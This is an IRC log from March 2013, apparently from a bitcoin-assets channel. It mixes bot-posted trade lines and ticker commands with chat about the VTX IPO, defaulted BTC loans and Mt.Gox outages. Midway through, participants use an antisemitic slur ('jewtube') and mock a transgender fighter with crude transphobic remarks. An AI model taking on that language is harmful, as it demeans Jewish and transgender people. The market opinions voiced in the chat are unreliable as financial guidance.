[HAVELOCK] [VTX] 7 @ 0.3862 = 2.7034 BTC [-] Mar 21 22:59:09 [HAVELOCK] [VTX] 152 @ 0.3862 = 58.7024 BTC [-] Mar 21 23:01:28 [HAVELOCK] [VTX] 2 @ 0.3862 = 0.7724 BTC [-] Mar 21 23:02:26 [MPEX] [S.MPOE] 7400 @ 0.00070629 = 5.2265 BTC [-] Mar 21 23:02:29 [MPEX] [S.MPOE] 3050 @ 0.0007046 = 2.149 BTC [-] Mar 21 23:06:49 [HAVELOCK] [VTX] 5 @ 0.3862 = 1.931 BTC [-] Mar 21 23:07:20 [HAVELOCK] [VTX] 5 @ 0.3862 = 1.931 BTC [-] Mar 21 23:08:08 [HAVELOCK] [VTX] 100 @ 0.3862 = 38.62 BTC [-] Mar 21 23:08:22 [HAVELOCK] [VTX] 1 @ 0.3862 BTC [-] Mar 21 23:11:17 [HAVELOCK] [VTX] 25 @ 0.3862 = 9.655 BTC [-] Mar 21 23:11:20 [HAVELOCK] [VTX] 18 @ 0.3862 = 6.9516 BTC [-] Mar 21 23:17:22 [HAVELOCK] [VTX] 3 @ 0.3857 = 1.1571 BTC [-] Mar 21 23:23:59 [MPEX] [S.MPOE] 4400 @ 0.00071498 = 3.1459 BTC [+] Mar 21 23:25:04 [MPEX] [S.DICE] 100 @ 0.00320004 = 0.32 BTC [-] Mar 21 23:25:07 [MPEX] [S.DICE] 618 @ 0.00320003 = 1.9776 BTC [-] Mar 21 23:25:51 [HAVELOCK] [VTX] 1 @ 0.3857 BTC [-] Mar 21 23:26:35 [HAVELOCK] [VTX] 13 @ 0.3857 = 5.0141 BTC [-] Mar 21 23:27:10 [HAVELOCK] [VTX] 2 @ 0.3857 = 0.7714 BTC [-] Mar 21 23:27:15 [HAVELOCK] [VTX] 30 @ 0.3857 = 11.571 BTC [-] Mar 21 23:27:36 [HAVELOCK] [VTX] 1 @ 0.3857 BTC [-] Mar 21 23:27:49 [HAVELOCK] [VTX] 2 @ 0.3857 = 0.7714 BTC [-] Mar 21 23:30:05 [HAVELOCK] [VTX] 3 @ 0.3857 = 1.1571 BTC [-] Mar 21 23:30:11 ;;bc,stats Mar 21 23:30:14 Current Blocks: 227224 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 583 blocks | Next Difficulty In About: 2 days, 15 hours, 53 minutes, and 25 seconds | Next Difficulty Estimate: 6402126.77703 | Estimated Percent Change: 32.06668 Mar 21 23:31:37 https://bitcointalk.org/index.php?topic=99497.msg1654981#msg1654981 Mar 21 23:31:39 priceless Mar 21 23:32:28 may need to keep records of shareholders in an illegal currency mining operation, for legal reasons Mar 21 23:32:29 [BTCTC] [ASICMINER-PT] 2 @ 0.85 = 1.7 BTC [-] Mar 21 23:32:33 [BTCTC] [ASICMINER-PT] 1 @ 0.833001 BTC [-] Mar 21 23:32:35 [BTCTC] [ASICMINER-PT] 11 @ 0.833 = 9.163 BTC [-] Mar 21 23:32:37 [BTCTC] [ASICMINER-PT] 2 @ 0.8325 = 1.665 BTC [-] Mar 21 23:32:39 [BTCTC] [ASICMINER-PT] 1 @ 0.83211 BTC [-] Mar 21 23:32:41 [BTCTC] [ASICMINER-PT] 6 @ 0.8321 = 4.9926 BTC [-] Mar 21 23:32:44 [BTCTC] [ASICMINER-PT] 18 @ 0.832 = 14.976 BTC [-] Mar 21 23:37:14 [HAVELOCK] [VTX] 11 @ 0.3857 = 4.2427 BTC [-] Mar 21 23:42:00 [HAVELOCK] [VTX] 10 @ 0.3857 = 3.857 BTC [-] Mar 21 23:42:06 [HAVELOCK] [VTX] 13 @ 0.3857 = 5.0141 BTC [-] Mar 21 23:42:56 [HAVELOCK] [VTX] 125 @ 0.3857 = 48.2125 BTC [-] Mar 21 23:43:58 [HAVELOCK] [VTX] 5 @ 0.3857 = 1.9285 BTC [-] Mar 21 23:44:20 [HAVELOCK] [VTX] 5 @ 0.3857 = 1.9285 BTC [-] Mar 21 23:44:37 [HAVELOCK] [VTX] 25 @ 0.3857 = 9.6425 BTC [-] Mar 21 23:44:48 ;;estimate Mar 21 23:44:49 Next difficulty estimate | 6398438.35799 based on data since last change | 7251846.01035 based on data for last three days Mar 21 23:46:10 [BTCTC] [GSDPT] 100 @ 0.0045 = 0.45 BTC [+] Mar 21 23:46:43 [HAVELOCK] [VTX] 26 @ 0.386 = 10.036 BTC [+] Mar 21 23:47:23 [HAVELOCK] [VTX] 50 @ 0.386 = 19.3 BTC [+] Mar 21 23:51:47 [BTCTC] [COGNITIVE] 1 @ 0.14 BTC [-] Mar 21 23:54:26 ;;ticker Mar 21 23:54:26 BTCUSD ticker | Best bid: 72.56962, Best ask: 72.97003, Bid-ask spread: 0.40041, Last trade: 72.56962, 24 hour volume: 96840.08022444, 24 hour low: 63.00000, 24 hour high: 74.90000, 24 hour vwap: 68.35320 Mar 21 23:55:15 new wealthy elite Mar 21 23:55:49 are you going to be repeating that all the way to 100k per? Mar 21 23:56:21 yeap Mar 21 23:58:12 [HAVELOCK] [VTX] 1 @ 0.386 BTC [+] Mar 21 23:58:57 low thresholds for CRASH! RALLY! TANKING! plox Mar 21 23:59:03 [HAVELOCK] [SDICE] 1 @ 0.44899 BTC [-] Mar 22 00:02:03 [HAVELOCK] [HIM] 1 @ 1.9999999 BTC [-] Mar 22 00:02:28 12798 blocks remaning ... 81 days behind. Mar 22 00:02:29 Yipes. Mar 22 00:04:02 [HAVELOCK] [SDICE] 25 @ 0.448 = 11.2 BTC [-] Mar 22 00:06:07 [HAVELOCK] [VTX] 3 @ 0.3862 = 1.1586 BTC [+] Mar 22 00:07:09 [HAVELOCK] [VTX] 70 @ 0.3862 = 27.034 BTC [+] Mar 22 00:07:46 [MPEX] [S.MPOE] 6624 @ 0.00071498 = 4.736 BTC [+] Mar 22 00:09:38 i know this is a loaded question, but Mar 22 00:10:03 [HAVELOCK] [SDICE] 6 @ 0.44899 = 2.6939 BTC [+] Mar 22 00:10:19 is there any precedent for holding an exchange culpable for a delay in transaction or deposit action that results in a loss of opporunity to buy at a lower price? Mar 22 00:10:49 ie CampBX taking 3 weeks to make my deposit Mar 22 00:12:03 [HAVELOCK] [SDICE] 2 @ 0.44899989 = 0.898 BTC [+] Mar 22 00:12:04 [HAVELOCK] [SDICE] 3 @ 0.4489999 = 1.347 BTC [+] Mar 22 00:12:14 [HAVELOCK] [VTX] 4 @ 0.3862 = 1.5448 BTC [+] Mar 22 00:13:03 [HAVELOCK] [SDICE] 3 @ 0.449 = 1.347 BTC [+] Mar 22 00:13:05 [HAVELOCK] [SDICE] 1 @ 0.45 BTC [+] Mar 22 00:13:18 [HAVELOCK] [VTX] 20 @ 0.3862 = 7.724 BTC [+] Mar 22 00:13:23 ;;thicker Mar 22 00:13:23 Error: "thicker" is not a valid command. Mar 22 00:13:46 ThickAsThieves, only precedent so far was smearing them all over btctalk and reddit, sadly Mar 22 00:13:50 ;;ticker Mar 22 00:13:51 Error: Failure to retrieve ticker. Try again later. Mar 22 00:14:06 ;;goxlag Mar 22 00:14:08 3.993033 seconds Mar 22 00:15:01 lol, like only goxlag stays working from their whole api Mar 22 00:15:19 [HAVELOCK] [VTX] 2 @ 0.386 = 0.772 BTC [-] Mar 22 00:15:43 I was about to buy VTX, but I don't want to buy it with BTC when the company is anchored to CAD. Mar 22 00:16:37 so if BTC goes up by 10x, I will not benefit from it to the full extent. Mar 22 00:17:49 thats a good point, among a pile of other reasons the asset is questionable Mar 22 00:18:15 yea but buying it by btc/cad has little to do with it Mar 22 00:18:34 [HAVELOCK] [VTX] 20 @ 0.386 = 7.72 BTC [-] Mar 22 00:19:02 [BTCTC] [S.DICE-PT] 1 @ 0.00486 BTC [+] Mar 22 00:19:04 [HAVELOCK] [SDICE] 22 @ 0.449 = 9.878 BTC [-] Mar 22 00:19:05 [HAVELOCK] [SDICE] 2 @ 0.4489999 = 0.898 BTC [-] Mar 22 00:21:10 jurov: I just can't see a reason to anchor the value in CAD. Might be easier in regulatory terms, but I don't think I want to invest in anything based on fiat. :) Mar 22 00:21:33 what is vtx Mar 22 00:21:50 theres only 3 viable bitcoin companies at the moment Mar 22 00:22:32 rikur, how it is anchored to CAD? only IPO amount or is there more long lastin anchor? Mar 22 00:22:35 [MPEX] [S.MPOE] 1936 @ 0.00071498 = 1.3842 BTC [+] Mar 22 00:22:41 [MPEX] [S.MPOE] 16700 @ 0.00071661 = 11.9674 BTC [+] Mar 22 00:22:42 [MPEX] [S.MPOE] 364 @ 0.0007234 = 0.2633 BTC [+] Mar 22 00:23:08 jurov: http://www.youtube.com/watch?v=BxkLKLIRkCI mentions that the stock will always be valued in CAD, not BTC Mar 22 00:23:59 but it is already valued in BTC.. at least on havelock website Mar 22 00:25:15 its tied to CAD there too Mar 22 00:25:19 it dynamically changes Mar 22 00:25:27 but that what i'm asking, how? Mar 22 00:25:31 [HAVELOCK] [VTX] 23 @ 0.386 = 8.878 BTC [-] Mar 22 00:25:44 topace programmed it to adjust Mar 22 00:25:48 at least for the ipo shares Mar 22 00:25:51 dunno about after Mar 22 00:26:28 so only the ipo price is cad, then? after ipo it will float freely against both cad and btc, no? Mar 22 00:26:34 jurov: hmm. Maybe the video was a bit misleading.. but it's weird and flawed. Mar 22 00:26:45 even if its free floating, Mar 22 00:26:50 its true value will be in cad Mar 22 00:26:55 will my stock valuation go down if BTC goes up or not? Mar 22 00:27:00 maybe I should call the guy and ask Mar 22 00:27:08 people will sell it for however many btc they choose Mar 22 00:27:24 but odds are it will go down in btc value if btc price goes up Mar 22 00:27:46 they are projecting 500k+ revenue for the year, Mar 22 00:27:54 and taking $300k in this IPO Mar 22 00:28:00 but that's true for any other asset that has some fiat-world operation, no? Mar 22 00:28:05 [HAVELOCK] [VTX] 2 @ 0.386 = 0.772 BTC [-] Mar 22 00:28:15 like ziggp, bitpride, esecurity,... Mar 22 00:28:21 yep Mar 22 00:29:51 meh.. the CAD valuation still bugs me off. I will give it some more thought. Mar 22 00:29:58 listening to that jewtube vid is like listening to some insta infinity money scam vid Mar 22 00:29:59 what i dont understand is, why are so many people buying so much of it Mar 22 00:30:21 yeah i couldnt watch it Mar 22 00:30:28 bitcoin bitcoin bitcoin! Mar 22 00:30:37 perhaps canadian pride Mar 22 00:30:58 rikur is the income derived in BTC or CAD? Mar 22 00:31:02 [HAVELOCK] [HIM] 1 @ 1.85560001 BTC [-] Mar 22 00:31:13 but i do like how thy took more time than some to prepare their documents and a vid Mar 22 00:31:22 it doesnt matter what the stock is *valued* in Mar 22 00:31:31 [HAVELOCK] [VTX] 13 @ 0.3866 = 5.0258 BTC [+] Mar 22 00:31:32 what matters is the income it recievers Mar 22 00:31:35 recieves Mar 22 00:31:42 they buy fiat, as it were Mar 22 00:31:46 what's the news, friends? Mar 22 00:31:48 right? Mar 22 00:31:54 tiberiusiv: I have absolutely no diea, since they will actually register you as a real shareholder of the canadian company (if you want). Mar 22 00:32:00 and even that extra if is weird. Mar 22 00:32:16 I don't think that a hybrid model between BTC and fiat works. Mar 22 00:32:22 that means hes paying canadian income tax Mar 22 00:32:34 explains why he has to do accounting in cad dollars Mar 22 00:32:50 Basically, the guy here is hoping to get 100 000 CAD worth of bitcoins, give you the CAD equilevant of his company to you and keep the bitcoins Mar 22 00:33:03 [HAVELOCK] [HIM] 1 @ 1.8556 BTC [-] Mar 22 00:33:04 [HAVELOCK] [HIM] 2 @ 1.855 = 3.71 BTC [-] Mar 22 00:33:11 yeah thats not gonna end well Mar 22 00:33:18 well, they do claim to have purposes for the IPO Mar 22 00:33:29 but if they cant make a profit with the revenue they have so far Mar 22 00:33:34 ... Mar 22 00:33:45 well with their volumes and 3% exchange fee, they should be able to cover the costs without it :) Mar 22 00:34:03 why would you ever do an IPO unless you have to? Mar 22 00:34:56 in bitcoin world, IPO means somehting different Mar 22 00:35:03 why not? free money Mar 22 00:35:16 [HAVELOCK] [VTX] 12 @ 0.3866 = 4.6392 BTC [+] Mar 22 00:35:17 [HAVELOCK] [VTX] 19 @ 0.3866 = 7.3454 BTC [+] Mar 22 00:35:30 IPO is just angel investing Mar 22 00:35:31 what does it mean in bitcoin world, thickasthieves? Mar 22 00:35:43 and wild speculation Mar 22 00:35:50 benkay, free money as i said Mar 22 00:36:25 nothing is free Mar 22 00:36:36 if you can stay anonymous it is Mar 22 00:36:58 free money to most of glbse assets Mar 22 00:37:05 even before the kerfuffle Mar 22 00:37:28 [HAVELOCK] [VTX] 12 @ 0.3866 = 4.6392 BTC [+] Mar 22 00:37:30 [HAVELOCK] [VTX] 12 @ 0.3866 = 4.6392 BTC [+] Mar 22 00:37:40 >95% of those turned out as outright scams Mar 22 00:37:54 https://www.bitvps.com/openvz-vps Mar 22 00:37:54 now we have a half dozen glbse clones Mar 22 00:37:59 New design rolled out Mar 22 00:38:04 [HAVELOCK] [HIM] 1 @ 1.855 BTC [-] Mar 22 00:38:13 Namworld: bad ssl cert? Mar 22 00:38:25 We need to install a new one Mar 22 00:38:58 looks slick :) Mar 22 00:39:15 But others staff complained about the tiles background. Mar 22 00:39:33 You prefer with the white background like it is now or the old one? Mar 22 00:39:38 its busted for me Mar 22 00:39:47 screenshot? Mar 22 00:40:03 if i remove the httpS its fine Mar 22 00:40:06 Investors show 404 Mar 22 00:40:12 otherwise it loads content only Mar 22 00:40:14 [HAVELOCK] [VTX] 3 @ 0.3866 = 1.1598 BTC [+] Mar 22 00:40:16 I know. I need to add that page Mar 22 00:40:34 is there a Managed option? Mar 22 00:40:34 bitcoin-assets Mar 22 00:40:44 once again testing production in public Mar 22 00:41:18 [HAVELOCK] [VTX] 4 @ 0.3866 = 1.5464 BTC [+] Mar 22 00:41:22 i'm paying Rackspace like $450/mo right now, seems overpriced... Mar 22 00:41:41 and the terms of use still lie that "Users with excessive CPU usage will be notified before any action is taken." Mar 22 00:42:03 [HAVELOCK] [SDICE] 3 @ 0.449 = 1.347 BTC [+] Mar 22 00:42:18 oh this is the same service that fumbled your ddos day Mar 22 00:42:21 :/ Mar 22 00:42:39 not that my clients would ever get ddos Mar 22 00:43:13 [HAVELOCK] [VTX] 1 @ 0.3866 BTC [+] Mar 22 00:43:21 i thought i got ddosed once, turns out that someone actually visited my site Mar 22 00:43:33 smickles, the blog? Mar 22 00:43:46 jurov: heh, yeah. ofc, i'm just kidding around Mar 22 00:44:02 A ban on DDoS is not about CPU. It's bandwidth saturating. Mar 22 00:44:04 i've got the mpex gui sales setup there too Mar 22 00:44:13 Yeah, we have a managed option Mar 22 00:44:59 link? Mar 22 00:45:08 meanwhile http://www.bloodyelbow.com/2013/3/9/4083184/fallon-fox-first-out-trans-wmma-fighter Mar 22 00:45:40 moment, still making fixes for the switchover Mar 22 00:45:48 lmao www.quickbitcoins.net linked from "News" testimony doesn't load Mar 22 00:45:52 wait, so a biological male is fighting women for money? Mar 22 00:46:03 the fembots must love this Mar 22 00:46:26 so typical for bitvps Mar 22 00:47:19 Namworld, can I add my testimony, too? Mar 22 00:47:28 [MPEX] [S.MPOE] 13036 @ 0.0007234 = 9.4302 BTC [+] Mar 22 00:47:29 hehe Mar 22 00:48:01 ThickAsThieves: thats not cricket! Mar 22 00:48:30 Namworld, feel free to copy/link this from your frontpage: https://www.bitcoinforum.com/coinbr-com/3713-coinbr-site-down/msg2408/#msg2408 Mar 22 00:48:42 getting to beat up on chicks just because you had your manbits chopped off Mar 22 00:49:28 big sacrifice Mar 22 00:49:33 i say let him play Mar 22 00:50:02 lol Mar 22 00:50:23 its actually a pretty awesome test for where the line is on feminism and gender equality Mar 22 00:50:51 are women willing to concede that men are simply more powerful to stop this? Mar 22 00:50:57 [HAVELOCK] [VTX] 6 @ 0.3921 = 2.3526 BTC [+] Mar 22 00:51:05 they don't concded this already? Mar 22 00:51:17 maybe mentally they do Mar 22 00:51:31 but i'm sure some butchies would disagree Mar 22 00:52:28 and i'm sure it would make many women cringe to say so Mar 22 00:52:53 i dunno Mar 22 00:57:00 poor namworld. i feel sorry now :( Mar 22 00:58:15 [HAVELOCK] [VTX] 97 @ 0.3921 = 38.0337 BTC [+] Mar 22 00:59:11 http://go.bloomberg.com/market-now/2013/03/21/sorry-bitcoin-isnt-a-currency/ Mar 22 01:02:56 Sorry, I was updating still Mar 22 01:03:26 yeah, quickbitcoins.net is no longer around Mar 22 01:05:26 [HAVELOCK] [VTX] 1 @ 0.3839 BTC [-] Mar 22 01:05:53 put in satoshidice comment to the bloomberg nonsense Mar 22 01:05:58 boy does that bloomberg article suck Mar 22 01:06:39 it reads like an essay that was turned in late by a 10th grader Mar 22 01:06:50 (american 10th grader, not vietnamese) Mar 22 01:06:52 that's all american print media can afford Mar 22 01:07:06 did you grok the atlantic kerfuffle recently? Mar 22 01:07:18 dont think so Mar 22 01:09:02 [BTCTC] [PAJKA.BOND] 3 @ 0.108999 = 0.327 BTC [-] Mar 22 01:10:17 some jr editor wanted to pay an author 100 bucks for a rewrite of a rather lengthy piece Mar 22 01:11:07 [BTCTC] [BTC-BOND] 13 @ 0.0099 = 0.1287 BTC [+] Mar 22 01:11:13 http://www.theatlantic.com/technology/archive/2013/03/a-day-in-the-life-of-a-digital-editor-2013/273763/ Mar 22 01:13:50 the article in question: http://www.nknews.org/2013/03/slam-dunk-diplomacy/ Mar 22 01:13:54 [HAVELOCK] [VTX] 9 @ 0.3839 = 3.4551 BTC [-] Mar 22 01:14:28 ;;goxlag Mar 22 01:14:29 25.624905 seconds Mar 22 01:14:32 ;;ticker Mar 22 01:14:33 Error: Failure to retrieve ticker. Try again later. Mar 22 01:17:39 [MPEX] [S.MPOE] 2964 @ 0.00072379 = 2.1453 BTC [+] Mar 22 01:17:41 [MPEX] [S.MPOE] 10786 @ 0.00072101 = 7.7768 BTC [-] Mar 22 01:18:47 ;;ticker Mar 22 01:18:47 Error: Failure to retrieve ticker. Try again later. Mar 22 01:18:54 ;;goxlag Mar 22 01:18:55 0 seconds Mar 22 01:19:00 that seems unlikely. Mar 22 01:19:02 ;;goxlag Mar 22 01:19:03 0.356072 seconds Mar 22 01:20:35 anyone think the recent price climb will end badly Mar 22 01:21:25 lots of people Mar 22 01:21:31 [BTCTC] [ASICMINER-PT] 1 @ 0.858 BTC [+] Mar 22 01:21:34 but "badly" is subjective. Mar 22 01:21:34 [BTCTC] [ASICMINER-PT] 1 @ 0.858 BTC [+] Mar 22 01:22:28 [HAVELOCK] [VTX] 26 @ 0.3828 = 9.9528 BTC [-] Mar 22 01:23:57 https://lh5.googleusercontent.com/-MccfK4Ruw2c/UUtLHPSPkGI/AAAAAAAAA2Y/OSWxUTiEDjA/s716/IMG_20130321_204509.jpg Mar 22 01:24:25 lol Mar 22 01:24:29 looks like its in the ghetto Mar 22 01:24:43 cheap floor, china ? Mar 22 01:24:48 nah, belaur Mar 22 01:24:50 belarus Mar 22 01:25:13 love the gloves Mar 22 01:25:36 i got a boner off of it. 4 avalons Mar 22 01:25:36 damn Mar 22 01:25:40 on a 7k usd mining device... Mar 22 01:26:24 moving on up from 3rd world to 1st with those 4 devices Mar 22 01:26:54 avalon is 65 or 85Ghs ? Mar 22 01:27:02 65 Mar 22 01:27:05 its 68 Mar 22 01:27:07 for 3 modules Mar 22 01:27:12 85 for 4 Mar 22 01:27:44 there was no option to upgrade to 4 modules for batch, if they charge 22 BTC for one module, then f that Mar 22 01:27:46 ok that why i had those numbers in head Mar 22 01:27:49 thanks Mar 22 01:28:30 even with the current price bitcoin liquidity has not substantially improved Mar 22 01:28:39 still huge slippage trying to sell larger ammounts Mar 22 01:29:07 ok so you tell me this guy, make 2K$ day ? Mar 22 01:29:44 yeap Mar 22 01:29:52 [HAVELOCK] [VTX] 5 @ 0.3828 = 1.914 BTC [-] Mar 22 01:29:53 depending on btc price increase, even more Mar 22 01:29:57 new floor soon Mar 22 01:30:41 aapl trades 2% of market cap per day Mar 22 01:30:49 bitcoin in comparison about 0.9% Mar 22 01:30:56 substantial liquidity problem imo Mar 22 01:31:13 true picture 100% ? can do the same box in one week Mar 22 01:31:44 what ever happened to ianbakewell Mar 22 01:31:49 he was 600 BTC short at 34.50 Mar 22 01:31:57 how was he shorting Mar 22 01:32:09 someone lend him coins ? Mar 22 01:32:18 hopefully mpex options Mar 22 01:32:19 [HAVELOCK] [VTX] 10 @ 0.3856 = 3.856 BTC [+] Mar 22 01:32:28 yeah Mar 22 01:32:37 hasnt been online since march 4th Mar 22 01:33:08 lol Mar 22 01:33:13 must have taken a bath Mar 22 01:33:18 didnt make the meme yet ? Mar 22 01:33:33 he missed 2 payments already Mar 22 01:33:37 alot of people got out between 20-30 Mar 22 01:33:39 his 3rd payment is due tomorrow Mar 22 01:33:48 payment on what Mar 22 01:33:50 link ? Mar 22 01:33:54 his payment schedule Mar 22 01:33:55 https://bitcointalk.org/index.php?topic=146689.msg1573807#msg1573807 Mar 22 01:34:02 [HAVELOCK] [VTX] 25 @ 0.3856 = 9.64 BTC [+] Mar 22 01:34:05 i dont know if he's been paying or not.. but Mar 22 01:34:14 that short must hurt like a bitch Mar 22 01:34:28 I should have no problem repaying this as long as BTC stays bellow $41.66 ... if it goes above we would need to work something out for a bit more time to repay. Mar 22 01:34:38 Last Active: March 04, 2013, 04:01:41 PM Mar 22 01:34:41 is this yet another guy who risked more than he had to lose? Mar 22 01:34:43 man these losers borrow BTC to sell for fiat to pay credit cards and shit Mar 22 01:35:04 i dont get why people are loaning BTC, to users who cannot even manage fiat debts Mar 22 01:35:25 https://btcjam.com/listings/2063 Mar 22 01:35:33 looks like he hasn't paid yet either Mar 22 01:35:44 Yeah, loaning is very risky Mar 22 01:35:48 I have 3 BTC lent out currently Mar 22 01:36:12 [BTCTC] [PAJKA.BOND] 7 @ 0.108999 = 0.763 BTC [-] Mar 22 01:36:13 i pick my loaners very carefully, and just small amounts Mar 22 01:36:22 ouch, sucks to be that aesop dood Mar 22 01:36:35 why would you lend to people who dont have BTC based incomes? Mar 22 01:37:09 right now there is maybe 0.1% of bitcoiners who have the capability to repay Mar 22 01:37:18 [HAVELOCK] [VTX] 2 @ 0.3856 = 0.7712 BTC [+] Mar 22 01:37:45 I posted a bet that ianbakewell is gonna scam Mar 22 01:37:52 it didnt get approved Mar 22 01:37:54 lol Mar 22 01:38:54 how can someone offer 3% a week on btc without having the income to pay Mar 22 01:38:56 regarding ian: http://www.quickmeme.com/meme/3th3is/ Mar 22 01:38:57 maybe it just needed to be rephrased Mar 22 01:39:04 his real interest rate is around 300% a week Mar 22 01:39:59 ;;ticker Mar 22 01:39:59 Error: Failure to retrieve ticker. Try again later. Mar 22 01:40:07 haha Mar 22 01:40:12 ;;goxlag Mar 22 01:40:12 0.18079 seconds Mar 22 01:40:15 amazing how people never question that Mar 22 01:40:23 then wonder why the present financial system is bankrupt Mar 22 01:40:25 ;;ticker Mar 22 01:40:26 Error: Failure to retrieve ticker. Try again later. Mar 22 01:40:30 broken? Mar 22 01:41:14 tiberiusiv: in many parts of the us, if you charge over x% annual (ie 10%) the debtor only has to pay back at the x% rate Mar 22 01:41:41 some places they can sue you and not have to pay back at all Mar 22 01:41:51 the thing is how do people expect someone to repay something extremely scarce and difficult to obtain Mar 22 01:42:05 if you have to borrow you should borrow USD Mar 22 01:42:26 you should always borrow known inflationary things Mar 22 01:42:27 [HAVELOCK] [VTX] 50 @ 0.3856 = 19.28 BTC [+] Mar 22 01:42:35 most of the bitcoin borrowers are such deadbeats that they cannot even obtain fiat credit, yetpeople are willing to loan them BTC? Mar 22 01:42:36 lol Mar 22 01:43:00 why wouldnt that joker just borrow off his credit card to buy the 300 BTC he needed Mar 22 01:43:18 that's an excellent idea Mar 22 01:43:25 brb maxing plastic Mar 22 01:43:37 well theres this kid who borrowed .7 btc Mar 22 01:43:37 it's cheaper than borrowing btc Mar 22 01:43:40 borrowing off the CC is much better then borrowing BTC Mar 22 01:43:41 and hes 13 Mar 22 01:43:45 3% weekly vs 30% annually Mar 22 01:43:59 smickles: the real rate of interest on BTC this week is like 300% Mar 22 01:44:14 that guys debt ballooned in USD terms Mar 22 01:44:18 of course he defaulted Mar 22 01:44:45 I weep for those 600 BTC Mar 22 01:44:47 if you cannot obtain fiat credit in a 0% interest rate world you have to be an utter deadbeat Mar 22 01:45:01 why arent btc creditors asking themselves that? Mar 22 01:46:14 https://bitcointalk.org/index.php?topic=140690.0 Mar 22 01:46:16 lol Mar 22 01:46:23 ;;calc 1.03 ** 52 Mar 22 01:46:23 4.65088589525 Mar 22 01:46:31 tiberiusiv: looks more like 465% Mar 22 01:46:33 There was this dude willing to lend this kid 100 BTC Mar 22 01:46:38 if he got other investors Mar 22 01:47:27 bitcoin has no mechanism(inflation) to bail out debtors Mar 22 01:47:44 so loans have to be very carefully analyzed Mar 22 01:48:11 you gotta figure a rate of deflation and tac that on to the charged interest Mar 22 01:48:29 as i said earlier, less then 0.1% of the bitcoin users qualify for BTC loans as first you need a BTC derived income Mar 22 01:48:48 meaning at the moment worthy borrowers are either miners, or those running btc gambling sites Mar 22 01:48:56 nobody else can afford to repay loans Mar 22 01:49:11 i do accounting for btc ;) Mar 22 01:49:29 and other related services Mar 22 01:49:47 but i'm not looking to borrow btc Mar 22 01:49:55 or usd for that matter Mar 22 01:50:22 [HAVELOCK] [VTX] 50 @ 0.3856 = 19.28 BTC [+] Mar 22 01:50:46 the benefit to bitcoin is it eliminates idiots from holding them Mar 22 01:50:48 yeah, but that's USD/hour derivated. Mar 22 01:50:56 as they lose them to scams Mar 22 01:51:21 Namworld: i suppose most of it is Mar 22 01:51:25 so on the end you only have scammers Mar 22 01:51:35 scammin each other off Mar 22 01:51:46 no you have the legit investors, scammers and legit business Mar 22 01:51:52 the idiot component is too broke to participate Mar 22 01:51:57 natural evolution Mar 22 01:52:05 eventually the scammers vanish Mar 22 01:53:04 overtime bitcoin related scams will decrease substantially Mar 22 01:53:05 ;;calc 130590.75406879/1000000000 Mar 22 01:53:06 0.000130590754069 Mar 22 01:53:35 and the scammed coins will be sold to real users(spent) or invested into btc business's Mar 22 01:53:35 !last s.mpoe Mar 22 01:53:36 The eagle never lost so much time as when he submitted to learn from the crow. Mar 22 01:53:47 !last m s.mpoe Mar 22 01:53:47 Last trade for S.MPOE on MPEX was at 0.00072101 BTC [-] Mar 22 01:54:25 ;;ticker Mar 22 01:54:25 Error: Failure to retrieve ticker. Try again later. Mar 22 01:54:33 what happened to the ticker Mar 22 01:54:45 mtgox http api v1 down? Mar 22 01:55:35 i haven't seen a mtgox usd trade go by in a while Mar 22 01:56:02 http://bitcoinity.org/markets Mar 22 01:56:11 ;;goxlag Mar 22 01:56:12 8.012634 seconds Mar 22 01:57:04 [HAVELOCK] [KCIM] 1 @ 1.001 BTC [-] Mar 22 01:57:09 and my bot can't read the mtgox depth for usd Mar 22 01:57:33 no mtgoxusd trades in the past hour or so according to amphipod Mar 22 01:58:03 [HAVELOCK] [VTX] 4 @ 0.3855 = 1.542 BTC [-] Mar 22 02:00:04 just check another exchange? Mar 22 02:00:42 gox suggested bid is 70.85 Mar 22 02:02:37 its not moving tho Mar 22 02:03:18 ;;goxlag Mar 22 02:03:19 0 seconds Mar 22 02:03:25 yeah right. Mar 22 02:03:41 tiberiusiv: gox still does > 80% of the public btc/fiat trade Mar 22 02:03:50 it's significant if they arn't trading Mar 22 02:04:15 or arn't trading usd, in this case Mar 22 02:04:30 seems like manipulation Mar 22 02:04:34 gox USD volumes are down to 62% Mar 22 02:04:51 gox does 68% total of EUR/USD Mar 22 02:04:58 by the end of 2013 i bet you gox USD trade is in the 50's Mar 22 02:05:08 [HAVELOCK] [VTX] 21 @ 0.3923 = 8.2383 BTC [+] Mar 22 02:05:21 by 2014 i would be surprised if gox did over 50% of fiat trade Mar 22 02:05:24 hmm, well that 62% is still around 10x their nearest competitor Mar 22 02:05:41 gox usd trade will be 0% next month right? Mar 22 02:05:44 smickles they have been bleeding market share since 2011 Mar 22 02:05:45 [HAVELOCK] [VTX] 1 @ 0.3923 BTC [+] Mar 22 02:05:54 [BTCTC] [PAJKA.BOND] 40 @ 0.108999 = 4.36 BTC [-] Mar 22 02:05:57 cuz coinlab Mar 22 02:06:11 [BTCTC] [PAJKA.BOND] 126 @ 0.109 = 13.734 BTC [+] Mar 22 02:06:33 this page seems to be working http://bitcoincharts.com/markets/ Mar 22 02:06:48 someone is hoping that bringing gox ops to america will make things work more smoothyl Mar 22 02:06:54 so we've stabilized at 70.85 Mar 22 02:07:05 exactly, and haven't moved for a while Mar 22 02:07:15 stable for 90 sec Mar 22 02:07:17 benkay: the US is still the center of the world Mar 22 02:08:09 bitcoincharts shows no trades since the new day on their chart Mar 22 02:08:36 smickles said stabilized Mar 22 02:08:50 only in jest, i swear! Mar 22 02:08:54 * ah- hah! * Mar 22 02:09:00 [HAVELOCK] [VTX] 13 @ 0.3923 = 5.0999 BTC [+] Mar 22 02:09:16 reminds me of pirate interest Mar 22 02:09:25 tiberiusiv: you're probably familiar with what happens to centers of the world when their currecies blow up Mar 22 02:09:33 currencies Mar 22 02:09:36 i cannot type today Mar 22 02:09:50 benkay: considering the majority of dollars are outside of the US the losses occur to creditors Mar 22 02:10:03 [HAVELOCK] [SDICE] 3 @ 0.4848 = 1.4544 BTC [+] Mar 22 02:10:17 MOAR DOLLARS Mar 22 02:10:20 for everyone Mar 22 02:10:29 bees.gif Mar 22 02:10:55 i ain't averse to it. Mar 22 02:11:06 70.85 and unchanged in 10 minutes Mar 22 02:11:23 bitcoinity is trading Mar 22 02:11:26 thats an mtgox error Mar 22 02:11:26 what are the other exchanges doing right now? Mar 22 02:11:35 74 on the canada exchange Mar 22 02:11:42 bitcoinity gox is trading Mar 22 02:11:45 23:27 <+amphipod> Mar21 23:27:38 bc 0.1689 @ 58.50 EUR Mar 22 02:11:48 23:28 <+amphipod> Mar21 23:27:51 